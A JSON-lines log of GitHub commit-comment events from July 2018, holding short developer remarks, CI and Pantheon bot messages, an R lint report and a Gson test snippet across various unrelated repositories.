{"id":"7990010571","type":"CommitCommentEvent","actor":{"login":"lyusupov"},"repo":{"name":"lyusupov/SoftRF"},"payload":{"comment":{"id":29766660,"position":null,"line":null,"path":null,"commit_id":"985b0053e9ea8f0223837e721bee9885aa05c978","created_at":"2018-07-19T15:41:09Z","updated_at":"2018-07-19T15:41:09Z","author_association":"OWNER","body":"```\r\n#define SOC_GPIO_PIN_SDA      14\r\n#define SOC_GPIO_PIN_SCL      2\r\n```\r\nSoftRF has a driver for **BMP**280\r\n"}},"created_at":"2018-07-19T15:41:09Z"}
{"id":"7990012842","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"eclipse/ceylon.formatter"},"payload":{"comment":{"id":29766670,"position":17,"line":943,"path":"source/ceylon/formatter/FormattingVisitor.ceylon","commit_id":"494c42bad1a11e50736379094457e155888c628c","created_at":"2018-07-19T15:41:31Z","updated_at":"2018-07-19T15:41:31Z","author_association":"CONTRIBUTOR","body":"Uh. I’m not sure WTF I committed here… yes, `fWriter` is the right argument. Do you want to send a pull request or should I just push a fix?"}},"created_at":"2018-07-19T15:41:31Z"}
{"id":"7990027079","type":"CommitCommentEvent","actor":{"login":"dwsteele"},"repo":{"name":"pgbackrest/pgbackrest"},"payload":{"comment":{"id":29766705,"position":null,"line":null,"path":null,"commit_id":"260a67738b6ba36edb1cfed6f8036d2bca8e57b9","created_at":"2018-07-19T15:43:49Z","updated_at":"2018-07-19T15:43:49Z","author_association":"MEMBER","body":"These changes look good to me."}},"created_at":"2018-07-19T15:43:49Z"}
{"id":"7990028181","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29766708,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-19T15:44:00Z","updated_at":"2018-07-19T15:44:00Z","author_association":"COLLABORATOR","body":"This means to build the files inside `src/lib/libc/regex/*` together with the fuzzed program.\r\n\r\nI think you can patch libc files when needed this way, adding checks based on `_LIBC`.\r\n\r\n```\r\n#ifdef _LIBC\r\n#include \"namespace.h\"\r\n#endif\r\n```"}},"created_at":"2018-07-19T15:44:00Z"}
{"id":"7990028655","type":"CommitCommentEvent","actor":{"login":"ArmatureCurrent"},"repo":{"name":"ArmatureCurrent/stm32async"},"payload":{"comment":{"id":29766709,"position":null,"line":null,"path":null,"commit_id":"9bec103807517bafbaf84c73bfbd80b566e8c9b3","created_at":"2018-07-19T15:44:05Z","updated_at":"2018-07-19T15:44:05Z","author_association":"OWNER","body":"This commit is requested by Guthub service:\r\n\r\n> On July 16 from approximately 10:30am - 11:30am PT, some of GitHub's services were temporarily interrupted which may have affected one or more of the repositories you pushed to during that time. During this interruption, some post_receive hooks may have failed to trigger. These include such things as webhooks, notifications, issue and PR cross references, and Pages builds. Our logs indicate that you pushed to the following repos during this time period:\r\n> \r\n> ArmatureCurrent/stm32async\r\n> \r\n> Any affected branches that have been pushed to since will have had their post_receive hooks triggered. For branches that haven’t been pushed to since, the best way to trigger the post_receive hooks would be to make a new push to the branch. If you don’t have any changes to push, an empty commit will suffice. To create an empty commit, you can use this command locally and then push to GitHub like you would normally:\r\n> \r\n> **git commit --allow-empty -m \"Empty commit to trigger post_receive hooks\"**\r\n> \r\n> We understand that you rely on GitHub and we take this interruption very seriously. If you have any questions or concerns about this, please don't hesitate to let us know. You can reach us by emailing support@github.com or by using our contact form and including the reference #07181993:"}},"created_at":"2018-07-19T15:44:05Z"}
{"id":"7990032487","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29766717,"position":null,"line":null,"path":null,"commit_id":"f33fbccc2bafd94d28ff146f28f06918c0da7f65","created_at":"2018-07-19T15:44:42Z","updated_at":"2018-07-19T15:44:42Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-19T15:44:42Z"}
{"id":"7990033141","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29766719,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-19T15:44:48Z","updated_at":"2018-07-19T15:44:48Z","author_association":"COLLABORATOR","body":"Also: https://github.com/php/php-src/commit/f2249bf95a2c378acf48c11bd787a0da8bf3c5e8"}},"created_at":"2018-07-19T15:44:48Z"}
{"id":"7990033753","type":"CommitCommentEvent","actor":{"login":"aharpervc"},"repo":{"name":"matthewdunbar/activerecord-sqlserver-adapter"},"payload":{"comment":{"id":29766720,"position":33,"line":71,"path":"lib/active_record/connection_adapters/sqlserver/type/time_value_fractional.rb","commit_id":"67317b316506388d17ec51e56528430323c3f822","created_at":"2018-07-19T15:44:55Z","updated_at":"2018-07-19T15:44:55Z","author_association":"NONE","body":"What's the story here?"}},"created_at":"2018-07-19T15:44:55Z"}
{"id":"7990035585","type":"CommitCommentEvent","actor":{"login":"slycoder"},"repo":{"name":"blackuy/react-native-twilio-video-webrtc"},"payload":{"comment":{"id":29766722,"position":null,"line":null,"path":null,"commit_id":"1e27e37c58d73c66dcdc4ec32ecab10ad7cf0187","created_at":"2018-07-19T15:45:13Z","updated_at":"2018-07-19T15:45:13Z","author_association":"COLLABORATOR","body":"You'll need to upgrade your pods to twilio v2.  I'll add migration instructions."}},"created_at":"2018-07-19T15:45:13Z"}
{"id":"7990041474","type":"CommitCommentEvent","actor":{"login":"lucaswerkmeister"},"repo":{"name":"eclipse/ceylon.formatter"},"payload":{"comment":{"id":29766735,"position":17,"line":943,"path":"source/ceylon/formatter/FormattingVisitor.ceylon","commit_id":"494c42bad1a11e50736379094457e155888c628c","created_at":"2018-07-19T15:46:11Z","updated_at":"2018-07-19T15:46:11Z","author_association":"CONTRIBUTOR","body":"Also, why did I extract `writeBinaryOperator()` from `visitBinaryOperatorExpression()` but then didn’t change `visitBinaryOperatorExpression()` to call the new function?\r\n\r\nApparently this commit was done around 8PM in the evening, so I can’t even excuse this with late-night tiredness or anything… seriously, what?"}},"created_at":"2018-07-19T15:46:11Z"}
{"id":"7990041693","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29766736,"position":null,"line":null,"path":null,"commit_id":"1924859e816ce31f2ba68e9e051c0ce8d1078fe7","created_at":"2018-07-19T15:46:13Z","updated_at":"2018-07-19T15:46:13Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-429](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-429).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-429-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-19T15:46:13Z"}
{"id":"7990042510","type":"CommitCommentEvent","actor":{"login":"upple"},"repo":{"name":"upple/practice"},"payload":{"comment":{"id":29766739,"position":null,"line":null,"path":null,"commit_id":"f0f8f3abe39146cdf42e62c8be645bb2fa5d04a2","created_at":"2018-07-19T15:46:21Z","updated_at":"2018-07-19T15:46:21Z","author_association":"OWNER","body":"시간최적화는 아닌듯\r\n"}},"created_at":"2018-07-19T15:46:21Z"}
{"id":"7990042701","type":"CommitCommentEvent","actor":{"login":"jrfnl"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29766740,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-19T15:46:22Z","updated_at":"2018-07-19T15:46:22Z","author_association":"COLLABORATOR","body":"If the docs are wrong, someone should probably correct them ;-)"}},"created_at":"2018-07-19T15:46:22Z"}
{"id":"7990044992","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29766747,"position":null,"line":null,"path":null,"commit_id":"e0fa336f10ce6a7977f0c0a5211e06120dbb0b5f","created_at":"2018-07-19T15:46:47Z","updated_at":"2018-07-19T15:46:47Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implement scroll to top feature](https://trello.com/c/bjFTvfZL/17-implement-scroll-to-top-feature)"}},"created_at":"2018-07-19T15:46:47Z"}
{"id":"7990051743","type":"CommitCommentEvent","actor":{"login":"mizzao"},"repo":{"name":"Nalinc/turkserver-meteor"},"payload":{"comment":{"id":29766758,"position":null,"line":null,"path":null,"commit_id":"066c9737481174c1a4fc7b1cbfe8432dcd158e38","created_at":"2018-07-19T15:47:53Z","updated_at":"2018-07-19T15:47:53Z","author_association":"NONE","body":"This branch looks like it might be a useful fix for TurkServer/TurkServer#28. Would you be willing to open up a PR?"}},"created_at":"2018-07-19T15:47:53Z"}
{"id":"7990054472","type":"CommitCommentEvent","actor":{"login":"pYr0x"},"repo":{"name":"stealjs/steal-tools"},"payload":{"comment":{"id":29766767,"position":null,"line":null,"path":null,"commit_id":"115b92af3a4ffc701c82e177839d7d3b6b863b41","created_at":"2018-07-19T15:48:21Z","updated_at":"2018-07-19T15:48:21Z","author_association":"CONTRIBUTOR","body":"that mean we can now use `await` in steal-tools ?? :100: "}},"created_at":"2018-07-19T15:48:21Z"}
{"id":"7990058744","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29766782,"position":null,"line":null,"path":null,"commit_id":"5d4c8662f452fdbda10cb00b8250b80722f26115","created_at":"2018-07-19T15:49:04Z","updated_at":"2018-07-19T15:49:04Z","author_association":"NONE","body":"[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig is.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:40:13:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_bedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:43:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_bedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:59:7:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_bedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_bedekking.R:60:7:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_bedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:40:13:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekking.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:43:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekking.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:59:7:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekking.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekking.R:60:7:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekking.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:40:13:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekkingExcl.R#L40) *style:* **Commented code should be removed.**\n```r\n<U+200B>    #       (.data$WaardeMin + .data$WaardeMax) / 2\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:43:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekkingExcl.R#L43) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande is om te testen of het concept werkt, berekening moet nog aangepast worden!!!\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:59:7:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekkingExcl.R#L59) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMin <- BedekkingGem * 0.9\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/s4_maxBedekkingExcl.R:60:7:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/s4_maxBedekkingExcl.R#L60) *style:* **Commented code should be removed.**\n```r\n<U+200B>    # BedekkingMax <- BedekkingGem * 1.1\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/selecteerKenmerkenInOpname.R:55:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/selecteerKenmerkenInOpname.R#L55) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/zzz.R:31:13:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/R/zzz.R#L31) *warning:* **no visible binding for global variable 'ConnectiePool'**\n```r\n<U+200B>  poolClose(ConnectiePool)\n            ^~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_1_databank.R:38:15:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_1_databank.R#L38) *style:* **Trailing whitespace is superfluous.**\n```r\n<U+200B>        ) %in% \n              ^\n```\n[inst/tests/testthat/test_1_databank.R:475:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_1_databank.R#L475) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_1_databank.R:476:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_1_databank.R#L476) *style:* **Trailing blank lines are superfluous.**\n```r\n<U+200B>\n^\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:26:3:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_berekenLSVIbasis.R#L26) *style:* **Commented code should be removed.**\n```r\n<U+200B># save(Resultaat, file = \"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:27:3:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_berekenLSVIbasis.R#L27) *style:* **Commented code should be removed.**\n```r\n<U+200B># load(\"inst/vbdata/Resultaat_test.Rdata\")\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:555:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_berekenLSVIbasis.R#L555) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen: \"Niet alle te evalueren soorten zijn opgenomen onder Data_soorten\\\\$Soort_Latijn, er wordt van uitgegaan dat de niet opgenomen soorten niet waargenomen zijn\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_berekenLSVIbasis.R:556:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_berekenLSVIbasis.R#L556) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog extra tests toevoegen voor genera en habitatsubtypes als de ontwikkeling hiervoor op punt staat\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/tests/testthat/test_s4_Aantal.R:189:1:](https://github.com/inbo/LSVI/blob/5d4c8662f452fdbda10cb00b8250b80722f26115/inst/tests/testthat/test_s4_Aantal.R#L189) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>  #nog toevoegen als het opzoeken van soorten in subniveaus opgelost is: de aggregatie van bedekkingen gebeurt correct\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T15:49:04Z"}
{"id":"7990063563","type":"CommitCommentEvent","actor":{"login":"lionelmichaud"},"repo":{"name":"lionelmichaud/SwimminpoolAutomate"},"payload":{"comment":{"id":29766800,"position":null,"line":null,"path":null,"commit_id":"2df12151833995a0da84a88fd16153ce40097629","created_at":"2018-07-19T15:49:53Z","updated_at":"2018-07-19T15:49:53Z","author_association":"OWNER","body":"Testée sur matériel : OK"}},"created_at":"2018-07-19T15:49:53Z"}
{"id":"7990063973","type":"CommitCommentEvent","actor":{"login":"anthonycr"},"repo":{"name":"vimeo/stag-java"},"payload":{"comment":{"id":29766802,"position":4,"line":462,"path":"stag-library/src/main/java/com/vimeo/stag/KnownTypeAdapters.java","commit_id":"b13aac112b39c5a133224ffbfb010efdb3fe62c0","created_at":"2018-07-19T15:49:57Z","updated_at":"2018-07-19T15:49:57Z","author_association":"MEMBER","body":"According to my testing, Gson throws an exception if anything other than a null or an array is passed. Here's the test I wrote to verify:\r\n\r\n```java\r\nclass StringArrayHolder {\r\n        @SerializedName(\"test\")\r\n        String[] test;\r\n\r\n        @Override\r\n        public boolean equals(Object o) {\r\n            if (this == o) { return true; }\r\n            if (o == null || getClass() != o.getClass()) { return false; }\r\n            final StringArrayHolder stringArrayHolder = (StringArrayHolder) o;\r\n            return Arrays.equals(test, stringArrayHolder.test);\r\n        }\r\n\r\n        @Override\r\n        public int hashCode() {\r\n            return Arrays.hashCode(test);\r\n        }\r\n}\r\n\r\n@Test\r\npublic void testStringArrayParsing() {\r\n        final String json = \"{test:hello}\";\r\n        final Gson gson = new GsonBuilder().create();\r\n\r\n        // Throws an Illegal\r\n        final StringArrayHolder array = gson.fromJson(json, StringArrayHolder.class);\r\n\r\n        System.out.println(array);\r\n}\r\n```"}},"created_at":"2018-07-19T15:49:57Z"}
{"id":"7990066013","type":"CommitCommentEvent","actor":{"login":"cellenar"},"repo":{"name":"cellenar/DoDreamEdu"},"payload":{"comment":{"id":29766809,"position":null,"line":null,"path":null,"commit_id":"7cb3a3d93e99445615a774ff9d264a202e3aae57","created_at":"2018-07-19T15:50:18Z","updated_at":"2018-07-19T15:50:18Z","author_association":"OWNER","body":"add my url"}},"created_at":"2018-07-19T15:50:18Z"}
{"id":"7990068690","type":"CommitCommentEvent","actor":{"login":"matthewp"},"repo":{"name":"stealjs/steal-tools"},"payload":{"comment":{"id":29766812,"position":null,"line":null,"path":null,"commit_id":"115b92af3a4ffc701c82e177839d7d3b6b863b41","created_at":"2018-07-19T15:50:45Z","updated_at":"2018-07-19T15:50:45Z","author_association":"MEMBER","body":"Yup!"}},"created_at":"2018-07-19T15:50:45Z"}
{"id":"7990069532","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29766816,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T15:50:54Z","updated_at":"2018-07-19T15:50:54Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1695 of 1695 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-19T15:50:54Z"}
{"id":"7990071210","type":"CommitCommentEvent","actor":{"login":"lrettig"},"repo":{"name":"ewasm/tests"},"payload":{"comment":{"id":29766824,"position":6,"line":6,"path":"GeneralStateTests/stEWASMTests/unreachable.json","commit_id":"cc4c031c24306e7d97c8d020c5fd7705d055ea2b","created_at":"2018-07-19T15:51:12Z","updated_at":"2018-07-19T15:51:12Z","author_association":"MEMBER","body":"I like that idea"}},"created_at":"2018-07-19T15:51:12Z"}
{"id":"7990073038","type":"CommitCommentEvent","actor":{"login":"lrettig"},"repo":{"name":"lrettig/ewasm-as-multisig"},"payload":{"comment":{"id":29766827,"position":5,"line":16,"path":"assembly/index.ts","commit_id":"ac8c58443755d13c55c645110ae59842faa0303a","created_at":"2018-07-19T15:51:30Z","updated_at":"2018-07-19T15:51:30Z","author_association":"OWNER","body":"got it, thanks!"}},"created_at":"2018-07-19T15:51:30Z"}
{"id":"7990076855","type":"CommitCommentEvent","actor":{"login":"matthewp"},"repo":{"name":"stealjs/steal-tools"},"payload":{"comment":{"id":29766836,"position":null,"line":null,"path":null,"commit_id":"115b92af3a4ffc701c82e177839d7d3b6b863b41","created_at":"2018-07-19T15:52:08Z","updated_at":"2018-07-19T15:52:08Z","author_association":"MEMBER","body":"@pYr0x Let's wait until a little while after release before we start using it though. Maybe a lot of people will complain and we have to come back to 6. Hopefully not though! ;-D"}},"created_at":"2018-07-19T15:52:08Z"}
{"id":"7990083570","type":"CommitCommentEvent","actor":{"login":"viubis"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29766852,"position":null,"line":null,"path":null,"commit_id":"a3fda9a8c88b21895371c48536330b694863626c","created_at":"2018-07-19T15:53:15Z","updated_at":"2018-07-19T15:53:15Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-19T15:53:15Z"}
